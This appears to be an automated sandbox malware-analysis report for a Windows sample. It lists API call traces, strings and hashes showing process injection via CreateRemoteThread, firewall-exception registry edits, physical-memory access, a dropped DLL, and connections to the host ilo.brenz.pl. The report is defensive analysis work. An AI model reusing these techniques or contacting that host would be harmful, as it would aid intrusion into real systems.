Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolume
String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3734769084-2287716718
Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
Instruction ID: 48ae7902ae7b0b59e0d321cd5551fc31945c41aab3136f9e629bcba434893ca6
Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
Instruction Fuzzy Hash: FED1C071404248BFEB35AF248C4ABEE3BACEF41314F04855AE94D9E182D6F85F45C76A

Function 7FE30601 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 184stringnativeprocessCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 7FE305BC
GetModuleHandleA.KERNEL32(7FE305FB), ref: 7FE30601
lstrcpyW.KERNEL32(\BaseNamedObjects\rnxtVt,\BaseNamedObjects\rnxtVt,?,?,?,?), ref: 7FE30719
lstrcpyW.KERNEL32(\BaseNamedObjects\rnxtVt,?), ref: 7FE30736
lstrcatW.KERNEL32(\BaseNamedObjects\rnxtVt,\rnxtVt), ref: 7FE30744
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000065A4,00000000,?,00000002,00000000,00000040), ref: 7FE30774
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 7FE3078F
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE307D2
Process32First.KERNEL32 ref: 7FE307E5
Process32Next.KERNEL32 ref: 7FE307F6
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE3080E
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00002FC3,00000002,00000000), ref: 7FE3084B
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE30866
CloseHandle.KERNEL32 ref: 7FE30875

Strings

\BaseNamedObjects\rnxtVt, xrefs: 7FE30718, 7FE30735, 7FE30743
\BaseNamedObjects\rnxtVt, xrefs: 7FE30717
csrs, xrefs: 7FE30835

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\rnxtVt$\BaseNamedObjects\rnxtVt$csrs
API String ID: 1545766225-676502312
Opcode ID: dcfbda88c1452e16d26fd376d2d59b1fd8c40ae983f26fda525faf50f22b961d
Instruction ID: 4034ee1ac34cf344d60b1b743f91cb73119df433e2ee071f6ee9a8f8d678e866
Opcode Fuzzy Hash: dcfbda88c1452e16d26fd376d2d59b1fd8c40ae983f26fda525faf50f22b961d
Instruction Fuzzy Hash: 0961BD31A05209FFDB619F10C84DBEE3B6EEF45719F904068EA0A9E590C7B1AF05CB95

Function 00479D0C Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 386librarythreadsleepCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00479D02), ref: 00479D0D
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00479D20
GetTickCount.KERNEL32 ref: 00479D54
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0047CEB7,00000000,00000000,00000000,00000000), ref: 00479E26
GetModuleFileNameA.KERNEL32(00000000,0047CA63,000000C8), ref: 00479EA3
CreateThread.KERNEL32(00000000,00000000,00479652,00000000,00000000), ref: 00479F01
CloseHandle.KERNEL32(?,1C567C50), ref: 00479F0A
CreateThread.KERNEL32(00000000,00000000,Function_00079849,00000000,00000000), ref: 00479FAA
CloseHandle.KERNEL32(?,00000000), ref: 00479FB3
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00479FC0
GetVersionExA.KERNEL32(?,?,00000000), ref: 0047A0BC
SetEvent.KERNEL32(D8533D84,?,00000000), ref: 0047A297
Sleep.KERNEL32(00007530,?,00000000), ref: 0047A2B8
ResetEvent.KERNEL32(D8533D84,?,00000000), ref: 0047A2CB

Strings

ADVAPI32.DLL, xrefs: 00479D1F
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00479ECD

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleThread$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolume
String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1484325168-2287716718
Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
Instruction ID: 0348aa8a99f5bb58e09168000f3f21ed7fdb8f68e561c110e3aa2a240045ceba
Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
Instruction Fuzzy Hash: 0AE1D071404248BEEB259F248C4ABEE3BACEF41304F04855AED4D9E182D6F85F45C7AA

Function 006F4178 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 192networksleepstringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 006F4057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 006F4066
socket.WS2_32(00000002,00000001,00000000), ref: 006F4097
connect.WS2_32(6F6C6902,006F3B09,00000010), ref: 006F40B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 006F40FB
wsprintfA.USER32 ref: 006F4179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 006F41B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,006F6AA2,00000000,00000000), ref: 006F41BD
GetTickCount.KERNEL32 ref: 006F41F6
Sleep.KERNEL32(00000064,?,00000000,6F6C6902,006F6AA2,00000000,00000000), ref: 006F428B
GetTickCount.KERNEL32 ref: 006F4294
closesocket.WS2_32(6F6C6902), ref: 006F42B8
SetEvent.KERNEL32(0000040C,?,00000000), ref: 006F42D6
Sleep.KERNEL32(00007530,?,00000000), ref: 006F42F7
ResetEvent.KERNEL32(0000040C,?,00000000), ref: 006F430A

Strings

020a00 . . :#a260b0403 +*, xrefs: 006F4178, 006F4195, 006F41DB
C:\WINDOWS\SYSTEM32\UXTHEME.DLL, xrefs: 006F41DA

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#a260b0403 +*$C:\WINDOWS\SYSTEM32\UXTHEME.DLL
API String ID: 883794535-3907549323
Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction ID: 86cc7e95a19332fe17394f2d4ad78c93938a12d4de23f7b66e6e8b95850826cc
Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction Fuzzy Hash: 0F71DC7150825DBAEB219F38881D7FE7BAEAF41310F040518EA5A9E681CBF45F41C765

Function 00402430 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 71libraryfileloaderCOMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 0040244F
LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 00402461
GetProcAddress.KERNEL32(00000000), ref: 00402468
LoadResource.KERNEL32(?,00000000), ref: 0040247A
LockResource.KERNEL32(00000000), ref: 00402489
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004024BD
WriteFile.KERNEL32 ref: 004024DC
CloseHandle.KERNEL32(00000000), ref: 004024E3

Strings

kernel32.dll, xrefs: 0040245A
SizeofResource, xrefs: 00402455
hra%u.dll, xrefs: 0040249A
<6@, xrefs: 004024A0

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Resource$FileLoad$AddressCloseCreateFindHandleLibraryLockProcWrite
String ID: <6@$SizeofResource$hra%u.dll$kernel32.dll
API String ID: 2921964263-2374908272
Opcode ID: 8a57ef22dd47a814e705dbe9eb76e98e586b3eddb95431373c2ff637a7035f3e
Instruction ID: 298c1543b4fc4cf1b22406217ce591795a308af8d218835589389581325cd5cf
Opcode Fuzzy Hash: 8a57ef22dd47a814e705dbe9eb76e98e586b3eddb95431373c2ff637a7035f3e
Instruction Fuzzy Hash: 9211E9321803007BE2309B659E4DFAB7BACDF85B10F054439FA42F21D0DBB9981586B9

Function 0047A139 Relevance: 13.7, APIs: 9, Instructions: 192sleepstringthreadCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(ilo.brenz.pl,?,00000000), ref: 0047A018
GetVersionExA.KERNEL32(?,?,00000000), ref: 0047A0BC
CreateThread.KERNEL32(00000000,00000000,Function_000797DA,6F6C6902,00000000), ref: 0047A175
CloseHandle.KERNEL32(?,00000000,6F6C6902,0047CA63,00000000,00000000), ref: 0047A17E
GetTickCount.KERNEL32 ref: 0047A1B7
Sleep.KERNEL32(00000064,?,00000000,6F6C6902,0047CA63,00000000,00000000), ref: 0047A24C
GetTickCount.KERNEL32 ref: 0047A255
SetEvent.KERNEL32(D8533D84,?,00000000), ref: 0047A297
Sleep.KERNEL32(00007530,?,00000000), ref: 0047A2B8
ResetEvent.KERNEL32(D8533D84,?,00000000), ref: 0047A2CB

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionlstrlen
String ID:
API String ID: 1413472813-0
Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction ID: 712269dbb71542e792dbdf9b15f3e06072d30830e5a6359557f50b1fe95982d4
Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction Fuzzy Hash: 5971EE31508248BAEB259F34881D7DE7BADEF81304F14864AE85E9E282C7F85F51C75A

Function 7FE329CC Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE32A36
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE32A55
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE32A7F
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE32A8C
UnmapViewOfFile.KERNEL32(?), ref: 7FE32AA4

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE32A00
\Device\PhysicalMemory, xrefs: 7FE329CC

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$\Device\PhysicalMemory
API String ID: 2985292042-3938670448
Opcode ID: f5b742b9587cdac67e2bb23952e5644605ce90bf8b7d29b5e49f46c6b19350d7
Instruction ID: f784499129cf61d4ff85df333bf3b76779e152c7d281c3d08bc0d42cf97a2f12
Opcode Fuzzy Hash: f5b742b9587cdac67e2bb23952e5644605ce90bf8b7d29b5e49f46c6b19350d7
Instruction Fuzzy Hash: 1C817A71A00219FFDB208F24CC89FAA77BDEF44705F614258ED499B295D3B0AF45CA91

Function 006F33E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 006F344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 006F3469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 006F3493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 006F34A0
UnmapViewOfFile.KERNEL32(?), ref: 006F34B8

Strings

\Device\PhysicalMemory, xrefs: 006F33E0
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 006F3414

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$\Device\PhysicalMemory
API String ID: 2985292042-3938670448
Opcode ID: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
Instruction ID: b81d83b63f850a011883c6bffa34a49200cb49da1c9492a3096ba929744748d7
Opcode Fuzzy Hash: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
Instruction Fuzzy Hash: 76817871500218BFEB248F14CC89ABA3BADEF45704F504658EE199B291D3F0AF458A68

Function 7FE329F1 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE32A36
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE32A55
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE32A7F
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE32A8C
UnmapViewOfFile.KERNEL32(?), ref: 7FE32AA4

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE32A00
ysic, xrefs: 7FE32A3C, 7FE32A52

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$ysic
API String ID: 2985292042-2835701104
Opcode ID: e096a308c09e6b02b95fe1d014301fff9b14a95bfc109e57e88e1af0ff91d58a
Instruction ID: 318294e3e7f85719ab3bc7b1e15188bdad7b77c11d20dad426282bd8f2c8130f
Opcode Fuzzy Hash: e096a308c09e6b02b95fe1d014301fff9b14a95bfc109e57e88e1af0ff91d58a
Instruction Fuzzy Hash: 77116D70640705FBEB218F10CC49FAA3B7DEF88704F544218EE1A9A290D7B4AF14C655

Function 006F3405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 006F344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 006F3469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 006F3493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 006F34A0
UnmapViewOfFile.KERNEL32(?), ref: 006F34B8

Strings

ysic, xrefs: 006F3450, 006F3466
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 006F3414

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$ysic
API String ID: 2985292042-2835701104
Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction ID: cf230c399c29659175db3fd9995718bfc7bd329843d8a078712c8241af12214d
Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction Fuzzy Hash: C9115B70140618BBEB24CF14CC59FAA366DEF88704F50451CEA199A3D0E7F46F188A68

Function 004793A1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 220filenativeCOMMON

